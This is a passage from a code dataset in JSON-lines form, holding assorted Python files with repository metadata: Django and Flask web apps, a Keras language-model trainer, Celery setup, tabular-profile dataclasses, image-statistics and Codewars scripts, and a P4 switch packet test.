m=__import__(sys.argv[1])\n #获取 module 模块下的app 赋值给一个变量\n application=getattr(m,sys.argv[2])\n httpd=HTTPServer(ADDR)\n httpd.setApp(application)\n print(\"Serving HTTP on port 8000\")\n httpd.serveForever()\nif __name__==\"__main__\":\n main()","repo_name":"qianpeng-shen/Study_notes","sub_path":"第二阶段笔记/pythonweb/day09/HttpServer.py","file_name":"HttpServer.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"12722095115","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom .import views\n\nurlpatterns = [\n \n path('',views.home,name='home'),\n path('about/',views.about,name='about'),\n path('services/',views.services,name='services'),\n path('contact/',views.contact,name='contacts'),\n \n path('team/',views.team,name='team'),\n path('terms/',views.terms,name='terms'),\n path('cliq/',views.cliq,name='cliq'),\n path('products/',views.products,name='products'),\n path('calendar/',views.calendar,name='calendar'),\n path('investment/',views.investment,name='investment'),\n\n path('privacy/',views.privacy,name='privacy'),\n path('otp/',views.otp,name='otp'),\n path('omis/',views.omis,name='omis'),\n path('gallery/',views.gallery,name='gallery')\n\n]\n","repo_name":"asterinnovations/newwebsite","sub_path":"website/website1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"10126573294","text":"#!/usr/bin/python3\n'''Sequence to sequence grammar check.\n'''\nfrom __future__ import print_function\n\nimport math\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, CuDNNLSTM, Dense, Embedding, Reshape, Concatenate, Lambda, Conv1D\nfrom keras import backend as K\nimport numpy as np\nimport h5py\nimport sys\nimport encoding\n\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nconfig = 
tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.29\nset_session(tf.Session(config=config))\n\nembed_dim = 16\nbatch_size = 128 # Batch size for training.\nepochs = 1 # Number of epochs to train for.\nlatent_dim = 128 # Latent dimensionality of the encoding space.\n\nwith h5py.File(sys.argv[1], 'r') as hf:\n output_text = hf['output'][:]\ndecoder_target_data = np.reshape(output_text, (output_text.shape[0], output_text.shape[1], 1))\ndecoder_input_data = np.zeros((output_text.shape[0], output_text.shape[1], 1), dtype='uint8')\ndecoder_input_data[:,1:,:] = decoder_target_data[:,:-1,:]\nmax_decoder_seq_length = output_text.shape[1]\nnum_encoder_tokens = len(encoding.char_list)\n\nprint(\"Number of sentences: \", output_text.shape[0])\nprint(\"Sentence length: \", output_text.shape[1])\nprint(\"Number of chars: \", num_encoder_tokens)\n\n# Define an input sequence and process it.\nreshape1 = Reshape((-1, embed_dim))\nembed = Embedding(num_encoder_tokens, embed_dim)\nconv = Conv1D(128, 5, padding='causal', activation='tanh')\nconv2 = Conv1D(128, 1, padding='causal', activation='tanh')\n\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, 1))\n# We set up our decoder to return full output sequences,\n# and to return internal states as well. We don't use the\n# return states in the training model, but we will use them in inference.\ndecoder_lstm = CuDNNLSTM(2*latent_dim, return_sequences=True)\ndecoder_lstm2 = CuDNNLSTM(latent_dim, return_sequences=True)\n\ndec_lstm_input = conv2(conv(reshape1(embed(decoder_inputs))))\n\ndecoder_outputs = decoder_lstm2(decoder_lstm(dec_lstm_input))\ndecoder_dense = Dense(num_encoder_tokens, activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model(decoder_inputs, decoder_outputs)\n\n# Run training\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['sparse_categorical_accuracy'])\nmodel.summary()\nmodel.fit(decoder_input_data, decoder_target_data,\n batch_size=batch_size,\n epochs=epochs,\n validation_split=0.2)\n# Save model\nmodel.save('language.h5')\n#model.load_weights('s2s.h5')\n","repo_name":"jmvalin/DeepProof","sub_path":"language_train.py","file_name":"language_train.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"41"} +{"seq_id":"34598197229","text":"\"\"\"https://docs.celeryproject.org/en/stable/django/first-steps-with-django.html\nhttps://www.section.io/engineering-education/django-celery-tasks/\nhttps://buildwithdjango.com/blog/post/celery-progress-bars/\nhttps://github.com/czue/celery-progress\n\"\"\"\nimport os\nfrom celery import Celery\nfrom . 
import settings\n\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wama.settings')\n# app = Celery('wama', broker='redis://127.0.0.1:6379//')\napp = Celery('wama')\n\n# Using a string here means the worker doesn't have to serialize\n# the configuration object to child processes.\n# - namespace='CELERY' means all celery-related configuration keys\n# should have a `CELERY_` prefix.\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\n# Load task modules from all registered Django app configs.\n# app.autodiscover_tasks()\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print(f'Request: {self.request!r}')\n\n\n@app.task\ndef do_work(self, list_of_work, progress_observer):\n total_work_to_do = len(list_of_work)\n for i, work_item in enumerate(list_of_work):\n # do_work_item(work_item)\n # tell the progress observer how many out of the total items we have processed\n progress_observer.set_progress(i, total_work_to_do)\n return 'work is complete'\n","repo_name":"fmoreau69/webapp-for-autormatic-media-anonymization","sub_path":"wama/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"41486902564","text":"\"\"\"Classes for Python objects derived from CSV files.\"\"\"\n\nimport re\nfrom dataclasses import dataclass, field\nfrom typing import List\nfrom .utils import is_uri_or_prefixed_uri\n\n\n@dataclass\nclass TAPStatementTemplate:\n \"\"\"Instances hold TAP/CSV elements related to statement templates.\"\"\"\n\n # pylint: disable=too-many-instance-attributes # It's a dataclass, right?\n # pylint: disable=invalid-name # for elements not named in snake case.\n\n propertyID: str = \"\"\n propertyLabel: str = \"\"\n mandatory: str = \"\"\n repeatable: str = \"\"\n valueNodeType: str = \"\"\n valueDataType: str = \"\"\n valueConstraint: str = \"\"\n valueConstraintType: str = \"\"\n valueShape: str = \"\"\n note: str = \"\"\n state_warns: dict = field(default_factory=dict)\n state_extras: dict = field(default_factory=dict)\n\n def normalize(self, settings):\n \"\"\"Normalizes specific fields.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n self._warn_if_propertyID_or_valueDataType_not_IRIlike()\n self._normalize_booleans_mandatory_repeatable()\n self._valueConstraintType_pattern_warn_if_valueConstraint_not_valid_regex()\n self._valueConstraintType_pattern_warn_if_used_with_value_shape()\n self._valueConstraintType_iristem_parse()\n self._valueConstraintType_iristem_warn_if_list_items_not_IRIs()\n self._valueConstraintType_languageTag_parse(settings)\n self._valueConstraintType_warn_if_used_without_valueConstraint()\n self._valueDataType_warn_if_used_with_valueNodeType_IRI()\n self._valueDataType_warn_if_valueNodeType_literal_used_with_any_valueShape()\n self._valueConstraintType_picklist_parse(settings)\n self._valueNodeType_is_from_enumerated_list(settings)\n self._parse_elements_configured_as_list_elements(settings)\n return self\n\n def _warn_if_propertyID_or_valueDataType_not_IRIlike(self):\n \"\"\"@@@\"\"\"\n if not is_uri_or_prefixed_uri(self.propertyID):\n self.state_warns[\n \"propertyID\"\n ] = f\"{repr(self.propertyID)} is not an IRI or Compact IRI.\"\n if self.valueDataType:\n if not is_uri_or_prefixed_uri(self.valueDataType):\n self.state_warns[\n \"valueDataType\"\n ] = f\"{repr(self.valueDataType)} is 
not an IRI or Compact IRI.\"\n\n def _normalize_booleans_mandatory_repeatable(self):\n \"\"\"Booleans take true/false (case-insensitive) or 1/0, default None.\"\"\"\n\n valid_values_for_true = [\"true\", \"1\"]\n valid_values_for_false = [\"false\", \"0\"]\n valid_values = valid_values_for_true + valid_values_for_false\n\n # pylint: disable=singleton-comparison\n if self.mandatory:\n mand = self.mandatory.lower()\n if mand not in valid_values:\n self.state_warns[\n \"mandatory\"\n ] = f\"{repr(self.mandatory)} is not a supported Boolean value.\"\n if mand in valid_values_for_true:\n self.mandatory = \"true\"\n elif mand in valid_values_for_false:\n self.mandatory = \"false\"\n\n if self.repeatable:\n repeat = self.repeatable.lower()\n if repeat not in valid_values:\n self.state_warns[\n \"repeatable\"\n ] = f\"{repr(self.repeatable)} is not a supported Boolean value.\"\n if repeat in valid_values_for_true:\n self.repeatable = \"true\"\n elif repeat in valid_values_for_false:\n self.repeatable = \"false\"\n\n return self\n\n def _valueConstraintType_iristem_parse(self):\n \"\"\"If valueConstraintType is Iristem, split valueConstraint on whitespace.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n if self.valueConstraintType == \"iristem\":\n if self.valueConstraint:\n self.valueConstraint = self.valueConstraint.split()\n return self\n\n def _valueConstraintType_iristem_warn_if_list_items_not_IRIs(self):\n \"\"\"If IRIStem, warn if valueConstraint list items do not look like IRIs.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n if self.valueConstraintType == \"iristem\":\n for list_item in self.valueConstraint:\n if not is_uri_or_prefixed_uri(list_item):\n self.state_warns[\"valueConstraint\"] = (\n f\"Value constraint type is {repr(self.valueConstraintType)}, \"\n f\"but {repr(list_item)} does not look like an IRI or \"\n \"Compact IRI.\"\n )\n return self\n\n def _valueConstraintType_pattern_warn_if_valueConstraint_not_valid_regex(self):\n \"\"\"If valueConstraintType Pattern, warn if valueConstraint not valid regex.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n if self.valueConstraintType == \"pattern\":\n try:\n re.compile(self.valueConstraint)\n except (re.error, TypeError):\n self.state_warns[\"valueConstraint\"] = (\n f\"Value constraint type is {repr(self.valueConstraintType)}, but \"\n f\"{repr(self.valueConstraint)} is not a valid regular expression.\"\n )\n return self\n\n def _valueConstraintType_pattern_warn_if_used_with_value_shape(self):\n \"\"\"Regular expressions cannot conform to value shapes.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n if self.valueConstraintType == \"pattern\":\n if self.valueShape:\n self.state_warns[\"valueConstraintType\"] = (\n f\"Value constraint type \"\n f\"({repr(self.valueConstraintType)}) \"\n \"cannot conform to a value shape.\"\n )\n\n def _valueConstraintType_languageTag_parse(self, settings):\n \"\"\"For valueConstraintType languageTag, splits valueConstraint on whitespace.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n sep = settings.get(\"list_item_separator\", \" \")\n if self.valueConstraintType == \"languagetag\":\n if self.valueConstraint:\n self.valueConstraint = self.valueConstraint.split(sep)\n self.valueConstraint = [x.strip() for x in self.valueConstraint if x]\n return self\n\n def _valueConstraintType_warn_if_used_without_valueConstraint(self):\n \"\"\"Warns if valueConstraintType used without 
valueConstraint.\"\"\"\n if self.valueConstraintType:\n if not self.valueConstraint:\n self.state_warns[\"valueConstraint\"] = (\n f\"Value constraint type \"\n f\"({repr(self.valueConstraintType)}) \"\n \"but no value constraint.\"\n )\n return self\n\n def _valueConstraintType_picklist_parse(self, settings):\n \"\"\"If valueConstraintType is Picklist, split valueConstraint on whitespace.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n sep = settings.get(\"list_item_separator\", \" \")\n if self.valueConstraintType == \"picklist\":\n if self.valueConstraint:\n self.valueConstraint = self.valueConstraint.split(sep)\n self.valueConstraint = [x.strip() for x in self.valueConstraint if x]\n return self\n\n def _valueNodeType_is_from_enumerated_list(self, settings):\n \"\"\"Take valueNodeType from configurable enumerated list, case-insensitive.\"\"\"\n valid_types = [\"iri\", \"bnode\", \"literal\"]\n if settings.get(\"value_node_types\"):\n valid_types += [vnt.lower() for vnt in settings[\"value_node_types\"]]\n if self.valueNodeType:\n self.valueNodeType = self.valueNodeType.lower() # normalize to lowercase\n if self.valueNodeType not in valid_types:\n self.state_warns[\n \"valueNodeType\"\n ] = f\"{repr(self.valueNodeType)} is not a valid node type.\"\n return self\n\n def _valueDataType_warn_if_valueNodeType_literal_used_with_any_valueShape(self):\n \"\"\"Value with node type Literal cannot conform to a value shape.\"\"\"\n self.valueNodeType = self.valueNodeType.lower()\n if self.valueShape:\n if self.valueNodeType == \"literal\":\n self.state_warns[\"valueDataType\"] = (\n \"Datatypes are only for literals, \"\n \"which cannot conform to a value shape.\"\n )\n\n def _valueDataType_warn_if_used_with_valueShape(self):\n \"\"\"Value with any datatype cannot conform to a value shape.\"\"\"\n if self.valueShape:\n if self.valueDataType:\n self.state_warns[\"valueDataType\"] = (\n \"Datatypes are only for literals, \"\n \"which cannot conform to a value shape.\"\n )\n\n def _valueDataType_warn_if_used_with_valueNodeType_IRI(self):\n \"\"\"Value with datatype implies Literal and cannot be node type IRI.\"\"\"\n node_type = self.valueNodeType.lower()\n if node_type in (\"iri\", \"uri\", \"bnode\"):\n if self.valueDataType:\n self.state_warns[\"valueDataType\"] = (\n f\"Datatypes are only for literals, \"\n f\"so node type should not be {repr(self.valueNodeType)}.\"\n )\n\n def _parse_elements_configured_as_list_elements(self, settings):\n \"\"\"Parse elements configured as list elementss.\"\"\"\n if settings.get(\"list_item_separator\"):\n separator = settings.get(\"list_item_separator\")\n else:\n separator = \" \"\n\n if settings.get(\"list_elements\"):\n list_elements = settings.get(\"list_elements\")\n else:\n list_elements = []\n\n for element in list_elements:\n if getattr(self, element):\n setattr(self, element, getattr(self, element).split(separator))\n\n return self\n\n def get_warnings(self):\n \"\"\"Emit self.state_warns as populated by self.normalize().\"\"\"\n return dict(self.state_warns)\n\n\n@dataclass\nclass TAPShape:\n \"\"\"An instance holds TAP/CSV row elements related to one given, named shape.\"\"\"\n\n # pylint: disable=invalid-name\n # True that propertyID, etc, do not conform to snake-case naming style.\n\n shapeID: str = \"\"\n shapeLabel: str = \"\"\n state_list: List[TAPStatementTemplate] = field(default_factory=list)\n shape_warns: dict = field(default_factory=dict)\n shape_extras: dict = field(default_factory=dict)\n\n def normalize(self, 
settings):\n \"\"\"Normalize values where required.\"\"\"\n self._normalize_default_shapeID(settings)\n return True\n\n def _normalize_default_shapeID(self, settings):\n \"\"\"If shapeID not specified, looks first in config, else sets \"default\".\"\"\"\n if not self.shapeID:\n self.shapeID = settings.get(\"default_shape_identifier\", \"default\")\n return self\n\n def get_warnings(self):\n \"\"\"Emit warnings dictionary self.shape_warns, populated by normalize() method.\"\"\"\n return dict(self.shape_warns)\n","repo_name":"philbarker/dctap-python","sub_path":"dctap/tapclasses.py","file_name":"tapclasses.py","file_ext":"py","file_size_in_byte":11210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"17963022030","text":"from flask import Flask, render_template, request\r\nfrom db import db\r\nimport math\r\n\r\nPAGE_SIZE = 10\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/')\r\n@app.route('/home', methods=[\"GET\", \"POST\"])\r\ndef home():\r\n # get paging parameter from GET string\r\n try:\r\n page = int(request.args.get('page', 1))\r\n except ValueError:\r\n page = 1\r\n\r\n # set detault to 1 if page is less than 1\r\n if page < 1:\r\n page = 1\r\n\r\n cursor = db().cursor()\r\n\r\n sql = (\"SELECT DISTINCT movie_imdb_rating.movie_id, COUNT(*) max_count \"\r\n \"FROM poster INNER JOIN movie_imdb_rating \"\r\n \"ON movie_imdb_rating.movie_id=poster.movie_id \"\r\n \"ORDER BY rating_wa DESC \")\r\n\r\n cursor.execute(sql)\r\n max_count = cursor.fetchone()['max_count']\r\n\r\n cursor.execute(\r\n \"SELECT DISTINCT movie_imdb_rating.movie_id, poster.poster, \"\r\n \"poster.title, movie_imdb_rating.rating_wa \"\r\n \"FROM poster INNER JOIN movie_imdb_rating \"\r\n \"ON movie_imdb_rating.movie_id=poster.movie_id \"\r\n \"ORDER BY rating_wa DESC \"\r\n \"LIMIT {}, {}\".format(\r\n (page - 1) * PAGE_SIZE, PAGE_SIZE)\r\n )\r\n\r\n page_count = math.ceil(max_count / PAGE_SIZE)\r\n\r\n return render_template('movie.html', movies=cursor, page_count=page_count,\r\n page=page, page_size=PAGE_SIZE)\r\n\r\n\r\n@app.route('/celebs')\r\ndef celebs():\r\n return render_template('celebs.html')\r\n\r\n\r\n@app.route('/ratings')\r\ndef ratings():\r\n return render_template('ratings.html')\r\n\r\n\r\n@app.route('/contact')\r\ndef contact():\r\n return render_template('contact.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run('127.0.0.1', 8080, True)\r\n","repo_name":"hettmett/aca_project_2019","sub_path":"pjweb.py","file_name":"pjweb.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"44193922274","text":"from django import forms\nfrom .models import Expense, GroupUser, Group\n\n\nclass GroupForm(forms.ModelForm):\n\n class Meta:\n model = Group\n fields = [\n 'name',\n ]\n\n\nclass ExpenseForm(forms.ModelForm):\n paid_date = forms.DateTimeField(widget=forms.DateTimeInput(format='%Y-%m-%d %H:%M'))\n\n class Meta:\n model = Expense\n fields = [\n 'title',\n 'price',\n 'paid_date',\n 'paid_by',\n 'split_with',\n 'comment'\n ]\n widgets = {\n 'split_with': forms.CheckboxSelectMultiple(),\n }\n\n\nclass SettleUpForm(forms.ModelForm):\n paid_to = forms.ModelChoiceField(queryset=GroupUser.objects.all())\n\n class Meta:\n model = Expense\n fields = [\n 'price',\n 'paid_date',\n 'paid_by',\n 'paid_to',\n ]\n\n labels = {\n 'price': 'Gave back',\n 
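            # note: the 'price' entry above relabels the Expense amount as 'Gave back' so this form reads as a repayment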
}","repo_name":"ViktoriaMelnyk/shared_expenses","sub_path":"groups/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"18945539232","text":"import rasterio\nimport os\nfrom multiprocessing import Pool\nimport tqdm\nimport json\nimport numpy as np\nimport tifffile\n\n\ndef check_image_stats_eurosat(path):\n\n \"\"\" Check channelwise statistics for multispectral image. \"\"\"\n\n image_stats = []\n img = rasterio.open(path).read()\n img = np.float64(img)\n for ch in range(img.shape[0]):\n image_stats.append({'min': img[ch, :, :].min().item(),\n 'max': img[ch, :, :].max().item(),\n 'mean': img[ch, :, :].mean().item(),\n 'var': img[ch, :, :].var().item(),\n 'std': img[ch, :, :].std().item(),\n 'sum_square_over_n': (img[ch, :, :]**2).mean().item()})\n return image_stats\n\n\ndef check_image_stats(path):\n\n \"\"\" Check channelwise statistics for multispectral image. \"\"\"\n\n image_stats = []\n img = tifffile.imread(path)\n img = np.float64(img)\n for ch in range(img.shape[-1]):\n image_stats.append({'min': img[:, :, ch].min().item(),\n 'max': img[:, :, ch].max().item(),\n 'mean': img[:, :, ch].mean().item(),\n 'var': img[:, :, ch].var().item(),\n 'std': img[:, :, ch].std().item(),\n 'sum_square_over_n': (img[:, :, ch]**2).mean().item()})\n return image_stats\n\n\ndef check_dataset_stats(root_dir, save=False, eurosat=False, filename=None):\n\n \"\"\" Getting channelwise statistics for the dataset. \"\"\"\n\n # collect all images\n image_paths = []\n if eurosat:\n class_folders = os.listdir(root_dir)\n for folder in class_folders:\n class_path = os.path.join(root_dir, folder)\n image_names = os.listdir(class_path)\n for image_name in image_names:\n image_paths.append(os.path.join(class_path, image_name))\n example_image = rasterio.open(image_paths[0]).read()\n num_channels = example_image.shape[0]\n else:\n image_names = os.listdir(root_dir)\n for image_name in image_names:\n image_paths.append(os.path.join(root_dir, image_name))\n example_image = tifffile.imread(image_paths[0])\n num_channels = example_image.shape[-1]\n num_images = len(image_paths)\n print('Calculating statistics on {} images.'.format(num_images))\n\n # checking image statistics separately\n all_image_stats = []\n check_image = check_image_stats_eurosat if eurosat else check_image_stats\n with Pool(1) as p:\n for stats in tqdm.tqdm(p.imap(check_image, image_paths), total=len(image_paths)):\n all_image_stats.append(stats)\n\n # aggregating statistics for the whole dataset\n channelwise_stats = []\n for i in range(num_channels):\n channelwise_stats.append({'min': 10e9, 'max': -1, 'mean': 0, 'var': 0, 'std': 0})\n means, ssqn = [[] for _ in range(num_channels)], [[] for _ in range(num_channels)]\n\n for j, stats in enumerate(all_image_stats):\n for i in range(num_channels):\n channelwise_stats[i]['min'] = min(stats[i]['min'], channelwise_stats[i]['min'])\n channelwise_stats[i]['max'] = max(stats[i]['max'], channelwise_stats[i]['max'])\n channelwise_stats[i]['mean'] += (stats[i]['mean'] - channelwise_stats[i]['mean']) / (j + 1)\n means[i].append(stats[i]['mean'])\n ssqn[i].append(stats[i]['sum_square_over_n'])\n for ch, channel in enumerate(channelwise_stats):\n sqm = (np.array(means[ch]).mean()**2).item() # squared mean\n var = 1/num_images * np.array(ssqn[ch]).sum() - sqm # dataset variance from image variances\n channel['var'], channel['std'] = var, var**.5\n print('min: {} \\t max: {} \\t mean: 
{:.02f} '.format(channel['min'], channel['max'], channel['mean'],) +\n '\\t var: {:.02f} \\t std: {:.02f}'.format(channel['var'], channel['std']))\n\n if save:\n filename = filename if filename is not None else 'spectrum_stats.json'\n with open(os.path.join(filename), 'w') as fout:\n json.dump(channelwise_stats, fout)\n\n return channelwise_stats\n\n\nif __name__ == '__main__':\n\n # check_dataset_stats('/home/mate/dataset/EuroSATallBands_train', save=True)\n check_dataset_stats('/home/mate/datasets/grss/Track1-MSI_A_train', save=True, eurosat=False,\n filename='gfc_channel_stats.json')\n # check_dataset_stats('C:\\datasets\\grss\\debug', save=True, eurosat=False)\n # check_dataset_stats('C:\\datasets\\debug', save=True, eurosat=True)\n # check_dataset_stats('/datasets/EuroSATallBands_test', save=True)\n\n\n","repo_name":"mkisantal/nonrgb-transfer","sub_path":"hsi_stats.py","file_name":"hsi_stats.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"14131359032","text":"'''\nhttps://www.codewars.com/kata/577bd026df78c19bca0002c0/train/python\n'''\n\ndef correct(s):\n for i in s:\n if i == '5':\n s = s.replace('5', 'S')\n elif i == '0':\n s = s.replace('0', 'O')\n elif i == '1':\n s = s.replace('1', 'I')\n return s \n\n\ndef correct(string):\n return string.translate(str.maketrans(\"501\", \"SOI\"))","repo_name":"Lebivans/Code_Wars","sub_path":"CodeWars/8 kyu/Correct_the_mistakes_of_the_character_recognition_software.py","file_name":"Correct_the_mistakes_of_the_character_recognition_software.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"17018823863","text":"class PortocolTest(pd_base_tests.ThriftInterfaceDataPlane):\n\tdef __init__(self):\n\t\tpd_base_tests.ThriftInterfaceDataPlane.__init__(self, [\"p4hdp\"])\n\n\tdef runTest(self):\n\t\tprint\n\t\tsess_hdl = self.conn_mgr.client_init()\n\n\t\tdev_tgt = DevTarget_t(0, hex_to_i16(0xFFFF))\n\t\tdevice = 0\n\n\t\n\t\t# p4hdp_carrier_port_ecmp_group_setup(self.client, sess_hdl, dev_tgt)\n\n\n\t\t# protocol_identify_setup(self.client, sess_hdl, dev_tgt)\n\t\t# p4hdp_inner_ports_setup(self.client, sess_hdl, dev_tgt)\n\t\t# carrier_ports_vlan_map_entry_setup(self.client, sess_hdl, dev_tgt)\n\t\t# inner_vlan_port_map_entry_setup(self.client, sess_hdl, dev_tgt)\n\n\n\n\t\t# client_init(self.client, sess_hdl, dev_tgt)\n\n\t\t# #Add the default entries\n\t\t# populate_default_entries(self.client, sess_hdl, dev_tgt, ipv6_enabled,\n\t\t# acl_enabled, tunnel_enabled, multicast_enabled,\n\t\t# int_enabled)\n\t\t# ret_init = populate_init_entries(\n\t\t# self.client, sess_hdl, dev_tgt, rewrite_index, rmac,\n\t\t# inner_rmac_group, outer_rmac_group, ipv6_enabled, tunnel_enabled)\n\n\t\t# mdp_virtual_test_intf_config(self.client, sess_hdl, dev_tgt)\n\n\t\t# mdp_virtual_test_user_config(self.client, sess_hdl, dev_tgt)\n\n\t\t# mdp_virtual_test_arp_config(self.client, sess_hdl, dev_tgt)\n\t\t# #mdp_virtual_test_user_print()\n\t\t#mdp_virtual_test_route_config(self.client, sess_hdl, dev_tgt)\n\n\n\t\tself.conn_mgr.complete_operations(sess_hdl)\n\n\n\t\t# carrier_client_port = 1\n\t\t# carrier_network_port = 2\n\n\t\t# carrier_client_port_vlan = 10\n\t\t# carrier_network_port_vlan = 20\n\n\t\t# inner_protocol_port = 4\n\n\n\t\t# print \"Checking load-balancing between 2 members\"\n\t\t# npkts = 4\n\t\t# counts = [0, 0]\n\t\t# for i in 
xrange(npkts):\n\t\t# ip_dst = \"192.168.0.{}\".format(i)\n\t\t# pkt = simple_tcp_packet(pktlen=124, eth_dst='00:33:33:33:33:33', ip_dst=ip_dst, tcp_dport=117)\n\t\t# exp_pkt1 = simple_tcp_packet(pktlen=128, eth_dst='00:33:33:33:33:33', dl_vlan_enable=True, vlan_vid=200, ip_dst=ip_dst, tcp_dport=117)\n\n\t\t# send_packet(self, carrier_network_port, str(pkt))\n\t\t# eg_idx = verify_packet_any_port(self, exp_pkt1, [7, 8])\n\t\t# counts[eg_idx[0]] += 1\n\t\t# #self.assertTrue(counts[0] >= npkts / 4)\n\t\t# #self.assertTrue(counts[1] >= npkts / 4)\n\t\t# print \"Checking load-balancing between 2 members: \", counts[0], counts[1],\n\t\t# #self.assertTrue(counts[0] + counts[1] == npkts)\n\n\t\t# print \"Checking inner tcp bgp protocol pkt\"\n\t\t# pkt1 = simple_tcp_packet(tcp_dport=179) \n\t\t# pkt = simple_gre_packet(\n\t\t# pktlen=124, \n\t\t# eth_src='00:77:66:55:44:33',\n\t\t# eth_dst='00:55:55:55:55:55',\n\t\t# ip_id=0,\n\t\t# ip_dst='10.200.1.3',\n\t\t# ip_src='10.100.1.1',\n\t\t# ip_ttl=64,\n\t\t# inner_frame=pkt1['IP'])\n\t\t# exp_pkt = simple_gre_packet(\n\t\t# pktlen=128,\n\t\t# dl_vlan_enable=True,\n\t\t# vlan_vid=100,\n\t\t# eth_src='00:77:66:55:44:33',\n\t\t# eth_dst='00:55:55:55:55:55',\n\t\t# ip_id=0,\n\t\t# ip_dst='10.200.1.3',\n\t\t# ip_src='10.100.1.1',\n\t\t# ip_ttl=64,\n\t\t# inner_frame=pkt1['IP']) \n\t\t# send_packet(self, carrier_client_port, str(pkt))\n\t\t# print \"Expecting packet on port\", inner_protocol_port\n\t\t# verify_packets(self, exp_pkt, [inner_protocol_port])\n\n\n\t\t# print \"Checking upd_dhcp protocol pkt\"\n\t\t# pkt = simple_udp_packet(udp_dport=67) \n\t\t# exp_pkt = simple_udp_packet(pktlen=104,\n\t\t# dl_vlan_enable=True,\n\t\t# vlan_vid=100, udp_dport=67)\n\n\t\t# send_packet(self, carrier_client_port, str(pkt))\n\t\t# print \"Expecting packet on port\", inner_protocol_port\n\t\t# verify_packets(self, exp_pkt, [inner_protocol_port])\n\n\n\t\t# print \"Checking l2 arp protocol pkt\"\n\t\t# pkt = simple_arp_packet(pktlen=100) \n\t\t# exp_pkt = simple_arp_packet(pktlen=104, vlan_vid=200)\n\n\t\t# send_packet(self, 5, str(pkt))\n\t\t# #verify_packets(self, exp_pkt, [inner_protocol_port])\n\n\n\t\t# print \"Sending packet port 4 -> port 3 \"\n\t\t# # pkt = simple_tcp_packet(\n\t\t# # eth_dst='02:01:00:00:06:0c',\n\t\t# # eth_src='00:12:01:00:00:01',\n\t\t# # ip_dst='2.2.2.22',\n\t\t# # ip_src='15.0.0.2',\n\t\t# # ip_id=101,\n\t\t# # ip_ttl=64,\n\t\t# # ip_ihl=5)\n\n\t\tpkt = simple_tcp_packet(\n\t\t\t eth_dst='04:01:03:00:06:0B',\n\t\t\t eth_src='00:11:01:00:00:01',\n\t\t\t ip_dst='20.0.0.2',\n\t\t\t ip_src='10.0.0.2',\n\t\t\t ip_id=101,\n\t\t\t ip_ttl=64,\n\t\t\t ip_ihl=5)\n\n \n\t\tsend_packet(self, 5, str(pkt))\n\n\n\n\n\t\tpppoePkt = simple_pppoe_packet(\n\t\t\t\t\teth_dst='02:01:00:00:06:0c',\n\t\t\t\t\teth_src='00:12:01:00:00:01',\n\t\t\t\t\tip_dst='2.2.2.222',\n\t\t\t\t\tip_src='15.0.0.2',\n\t\t\t\t\tpppoe_version=1,\n\t\t\t\t\tpppoe_type=1,\n\t\t\t\t\tpppoe_code=0,\n\t\t\t\t\tpppoe_session=1)\n \n\n\t\tsend_packet(self, 3, str(pppoePkt))\n\n\n\n\t\tself.conn_mgr.complete_operations(sess_hdl)\n\t\tself.conn_mgr.client_cleanup(sess_hdl)\n","repo_name":"ncutwy/yuanbao","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"19486517062","text":"from flask import Flask, request, jsonify\nfrom flask_pymongo import PyMongo\nfrom bson.json_util import dumps\nimport json\nimport bson\nfrom bson.objectid import 
